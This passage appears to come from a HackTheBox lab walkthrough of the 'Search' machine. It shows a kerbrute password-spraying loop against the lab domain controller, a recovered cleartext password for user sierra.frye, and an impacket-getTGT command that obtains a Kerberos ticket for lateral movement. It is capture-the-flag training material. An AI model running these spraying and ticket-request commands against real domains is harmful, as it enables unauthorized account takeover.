sierra.frye
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ for passwd in $(cat phished_passwds.txt); do kerbrute passwordspray --dc research.search.htb -d SEARCH.HTB ./phished_users.txt $passwd -t 40; done
[...REDACTED...]
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 01/30/24 - Ronnie Flathers @ropnop
2024/01/30 20:51:13 > Using KDC(s):
2024/01/30 20:51:13 > research.search.htb:88
2024/01/30 20:51:13 > [+] VALID LOGIN: Sierra.Frye@SEARCH.HTB:$$49=wide=STRAIGHT=jordan=28$$18
2024/01/30 20:51:13 > Done! Tested 14 logins (1 successes) in 0.120 seconds
[...REDACTED...]
upon testing out those uncovered cleartext credentials, a valid domain credential is found; sierra.frye
:$$49=wide=STRAIGHT=jordan=28$$18
The user hasn’t changed the password since the incident
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ impacket-getTGT SEARCH.HTB/sierra.frye@research.search.htb -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: $$49=wide=STRAIGHT=jordan=28$$18
[*] Saving ticket in sierra.frye@research.search.htb.ccache
Validated and TGT generated
Lateral Movement made to the sierra.frye
user